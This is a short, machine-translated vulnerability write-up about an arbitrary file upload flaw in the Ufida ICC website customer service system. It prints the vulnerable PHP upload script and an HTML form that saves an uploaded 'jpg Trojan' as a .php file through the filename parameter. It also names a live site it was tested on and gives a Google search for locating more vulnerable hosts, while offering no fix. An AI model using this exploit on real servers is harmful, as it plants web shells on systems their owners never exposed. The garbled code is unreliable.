Ufida icc website customer service system Arbitrary File Upload Vulnerability

Another File Upload Vulnerability in the customer service system of the ufida icc website looked at the previous vulnerability: http://www.bkjia.com/article/201204/425159.html, and found that the vulnerability still exists.
I don't know if the upgrade is not completed yet or if there are any problems, but there are vulnerabilities in multiple websites.
 
/Home/ecccs/web/5107/upload/screenImagesSave. php (related uploads are also available)
 
 
<? Php
/**
* ScreenImagesSave. php
*
*/
Require_once ('../global. inc. php ');
 
// Get request.
$ Ft = intval ($ _ REQUEST ['ft ']);
 
/*
Chdir ($ CONFIG ["canned_file_tmp"]);
Exec ("rm-rf *");
*/
 
$ Date = date ("Ymd ");
$ Dest = $ CONFIG-> basePath. 'data/files/'. $ date ."/";
If (! Is_dir ($ dest) mkdir ($ dest, 0777 );
 
$ Filename = paramsFmt (urldecode ($ _ GET ["filename"]);
 
$ NameExt = strtolower ($ COMMON-> getFileExtName ($ _ FILES ['file'] ['name']);
 
$ UnallowedType = array ('php', 'jsp ', 'asp', 'sh', 'pl ', 'js', 'jar', 'jad ', 'class', 'java ');
If (in_array ($ nameExt, $ unallowedType )){
If ($ ft = '1 '){
Echo 'pe ';
} Else if ($ ft = '2 '){
Echo 'fe ';
}
Exit;
}
 
/* Www.2cto.com
If (empty ($ filename) $ filename = date ("Ymdhms"). "_ noname. file ";
Echo $ date. "/". $ filename;
*/
 
$ FilenameNew = $ dest. $ filename;
 
If (empty ($ _ FILES ["file"] ['error']) {
Move_uploaded_file ($ _ FILES ["file"] ["tmp_name"], $ filenameNew );
}
 
If (file_exists ($ filenameNew )){
Echo (urlencode ($ CONFIG-> baseUrl. 'data/files/'. $ date. "/". $ filename ));
@ Chmod ($ filenameNew, 0444 );
} Else {
If ($ ft = '1 '){
Echo 'pe ';
} Else if ($ ft = '2 '){
Echo 'fe ';
}
}
?>
 
 
Note that filename does not exist? The type of the file to be uploaded is verified, but the saved file name is the filename GET parameter. Dizzy ..
 
<Form id = "QuickSearch" name = "QuickSearch" enctype = "multipart/form-data" method = "post" action = "http://xxx.xxxx.com/5107/upload/screenImagesSave.php? Filename = xx. php ">
<Input type = "file" name = "file">
<Input type = "submit" name = "QuickSearchBtn" value = "Upload">
</Form>
 
Upload a jpg Trojan file, that is, the trojan File Uploaded successfully as xx. php.
Tested:
Http://icc.5107.cn/
And Google Search
And so on.
 
Search:
Https://www.google.com/search? Q = inurl:/5107/upload. php & hl = en & noj = 1 & prmd = imvns & ei = e12mt4ug?ji=7ofnhaw & start = 10 & sa = N & filter = 0 & biw = 1366 & bih = 618

 
 
Solution:

Should Know!



Author: Jannock